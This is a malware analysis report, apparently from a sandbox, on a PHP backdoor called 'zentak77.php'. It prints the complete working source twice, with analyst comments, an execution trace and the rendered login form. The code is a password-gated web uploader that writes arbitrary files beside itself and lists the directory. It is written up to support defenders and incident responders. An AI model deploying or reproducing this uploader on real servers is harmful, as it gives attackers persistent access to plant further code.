PHP Malware Analysis

zentak77.php

md5: 4db1d6f3393e958b7767f13b85b5c510


Deobfuscated PHP code

<?php

// Analyst note: the access password is hard-coded in plaintext. The literal is
// compared against POST input and the session value in the gate further down.
$pass = "zentak77";
// Opens a PHP session; the gate below stores the password in $_SESSION['pass']
// after a successful login, so later requests skip the prompt.
session_start();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256" /></head><body>
<?php 
// Access gate (analyst notes). The script exits inside this block unless the
// session already holds the hard-coded password or the request POSTs it.

// ?action=logout destroys the session and clears the stored value.
if (!empty($_GET['action']) && $_GET['action'] == "logout") {
    session_destroy();
    unset($_SESSION['pass']);
}
// $this_script is derived from PHP_SELF but is not read again in this listing.
$path_name = pathinfo($_SERVER['PHP_SELF']);
$this_script = $path_name['basename'];
// Missing or empty values are replaced with '' before the comparisons below.
if (empty($_SESSION['pass'])) {
    $_SESSION['pass'] = '';
}
if (empty($_POST['pass'])) {
    $_POST['pass'] = '';
}
if ($_SESSION['pass'] !== $pass) {
    // Plain comparison of the POSTed value with the plaintext secret; no hashing,
    // attempt limiting or lockout appears anywhere in this listing.
    if ($_POST['pass'] == $pass) {
        $_SESSION['pass'] = $pass;
    } else {
        // Unauthenticated response: a bare form with one password field named
        // "pass" (this is the output shown under "Generated HTML code").
        // PHP_SELF is written into the action attribute without HTML escaping.
        echo '<form action="' . $_SERVER['PHP_SELF'] . '" method="post"><input name="pass" type="password"><input type="submit"></form>';
        exit;
    }
}
?>


<form enctype="multipart/form-data" action="<?php 
// Analyst note: the upload form posts back to this same script; PHP_SELF is
// written into the attribute without HTML escaping.
echo $_SERVER['PHP_SELF'];
?>" method="POST">
Please choose a file: <input name="file" type="file" /><br />
<input type="submit" value="Upload" /></form>


<?php 
// Upload handler (analyst notes). Reached only after the password gate above.
if (!empty($_FILES["file"])) {
    if ($_FILES["file"]["error"] > 0) {
        echo "Error: " . $_FILES["file"]["error"] . "<br>";
    } else {
        // The client-supplied file name is echoed without HTML escaping.
        echo "Stored file:" . $_FILES["file"]["name"] . "<br/>Size:" . $_FILES["file"]["size"] / 1024 . " kB<br/>";
        // The upload is moved to the client-supplied name with no directory prefix
        // and no check on extension, content type or size, and the return value is
        // ignored. For responders: files created next to this script after its
        // first appearance should be treated as suspect.
        move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
    }
}
// Directory listing of "." (the same relative location the upload is written to).
$myDirectory = opendir(".");
// Collect every entry. $dirArray is never initialised before the first append,
// and the loop condition is a truthiness test on the entry name.
while ($entryName = readdir($myDirectory)) {
    $dirArray[] = $entryName;
}
closedir($myDirectory);
// The printed count includes dot entries, which the table below leaves out.
$indexCount = count($dirArray);
echo "{$indexCount} files<br/>";
sort($dirArray);
// The fixed table header (Filename / Filetype / Filesize) is a static string in
// the authenticated response.
echo "<TABLE border=1 cellpadding=5 cellspacing=0 class=whitelinks><TR><TH>Filename</TH><th>Filetype</th><th>Filesize</th></TR>\n";
for ($index = 0; $index < $indexCount; $index++) {
    // Entries whose name starts with "." are skipped.
    if (substr("{$dirArray[$index]}", 0, 1) != ".") {
        // Each name is emitted as a relative link and as text, without HTML escaping,
        // alongside its filetype() and filesize() values.
        echo "<TR>\r\n            <td><a href=\"{$dirArray[$index]}\">{$dirArray[$index]}</a></td>\r\n            <td>" . filetype($dirArray[$index]) . "</td>\r\n            <td>" . filesize($dirArray[$index]) . "</td>\r\n                </TR>";
    }
}
echo "</TABLE>";

Execution traces

data/traces/4db1d6f3393e958b7767f13b85b5c510_trace-1676245373.4875.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:43:19.385330]
1	0	1	0.000137	393528
1	3	0	0.000260	407392	{main}	1		/var/www/html/uploads/zentak77.php	0	0
1		A						/var/www/html/uploads/zentak77.php	2	$pass = 'zentak77'
2	4	0	0.000290	407392	session_start	0		/var/www/html/uploads/zentak77.php	3	0
2	4	1	0.000343	408144
2	4	R			TRUE
2	5	0	0.000361	408144	pathinfo	0		/var/www/html/uploads/zentak77.php	10	1	'/uploads/zentak77.php'
2	5	1	0.000378	408856
2	5	R			['dirname' => '/uploads', 'basename' => 'zentak77.php', 'extension' => 'php', 'filename' => 'zentak77']
1		A						/var/www/html/uploads/zentak77.php	10	$path_name = ['dirname' => '/uploads', 'basename' => 'zentak77.php', 'extension' => 'php', 'filename' => 'zentak77']
1		A						/var/www/html/uploads/zentak77.php	11	$this_script = 'zentak77.php'
1		A						/var/www/html/uploads/zentak77.php	12	_SESSION['pass'] = ''
1		A						/var/www/html/uploads/zentak77.php	13	_POST['pass'] = ''
			0.000481	330152
TRACE END   [2023-02-12 21:43:19.385702]


Generated HTML code

<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"></head><body>
<form action="/zentak77.php" method="post"><input name="pass" type="password"><input type="submit"></form></body></html>

Original PHP code

<?php
// Analyst note: plaintext, hard-coded access password, checked by the gate below.
$pass = "zentak77";
// Session is opened so the gate below can remember a successful login.
session_start();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256" /></head><body>
<?php
// Access gate (analyst notes): the script exits here unless the session or the
// POSTed "pass" field matches the hard-coded password.
// ?action=logout tears the session down.
if (!empty($_GET['action']) &&  $_GET['action'] == "logout") {session_destroy();unset ($_SESSION['pass']);}

// $this_script is computed but not read again in this listing.
$path_name = pathinfo($_SERVER['PHP_SELF']);
$this_script = $path_name['basename'];
// Missing or empty values become '' before the comparisons.
if (empty($_SESSION['pass'])) {$_SESSION['pass']='';}
if (empty($_POST['pass'])) {$_POST['pass']='';}
if ( $_SESSION['pass']!== $pass) 
{
    // Plain comparison with the plaintext secret; no hashing or attempt limiting
    // is present in this listing.
    if ($_POST['pass'] == $pass) {$_SESSION['pass'] = $pass; }
    else 
    {
        // Unauthenticated response is only this password form; PHP_SELF is placed
        // in the action attribute without HTML escaping.
        echo '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><input name="pass" type="password"><input type="submit"></form>';
        exit;
    }
}
?>


<form enctype="multipart/form-data" action="<?php /* analyst note: PHP_SELF is echoed without HTML escaping */ echo $_SERVER['PHP_SELF']; ?>" method="POST">
Please choose a file: <input name="file" type="file" /><br />
<input type="submit" value="Upload" /></form>


<?php 

// Upload handler (analyst notes). Runs only after the password gate above.
if (!empty($_FILES["file"]))
{
    if ($_FILES["file"]["error"] > 0)
       {echo "Error: " . $_FILES["file"]["error"] . "<br>";}
    else
       // The client-supplied name is echoed unescaped, then used as the destination:
       // no directory prefix, no extension/type/size check, return value ignored.
       // For responders: files that appeared next to this script are suspect.
       {echo "Stored file:".$_FILES["file"]["name"]."<br/>Size:".($_FILES["file"]["size"]/1024)." kB<br/>";
       move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);
       }
}

    // Directory listing of "." (the same relative location uploads are written to).
    $myDirectory = opendir(".");
    // Collect every entry; $dirArray is never initialised before the first append,
    // and the loop condition is a truthiness test on the entry name.
    while($entryName = readdir($myDirectory)) {$dirArray[] = $entryName;} closedir($myDirectory);
    // The printed count includes dot entries that the table below omits.
    $indexCount = count($dirArray);
        echo "$indexCount files<br/>";
    sort($dirArray);

    // Fixed table header: a static string in the authenticated response.
    echo "<TABLE border=1 cellpadding=5 cellspacing=0 class=whitelinks><TR><TH>Filename</TH><th>Filetype</th><th>Filesize</th></TR>\n";

        for($index=0; $index < $indexCount; $index++) 
        {
            // Names starting with "." are skipped; every other name is emitted as a
            // relative link and as text without HTML escaping, with filetype() and
            // filesize() values beside it.
            if (substr("$dirArray[$index]", 0, 1) != ".")
            {
            echo "<TR>
            <td><a href=\"$dirArray[$index]\">$dirArray[$index]</a></td>
            <td>".filetype($dirArray[$index])."</td>
            <td>".filesize($dirArray[$index])."</td>
                </TR>";
            }
        }
    echo "</TABLE>";
    ?>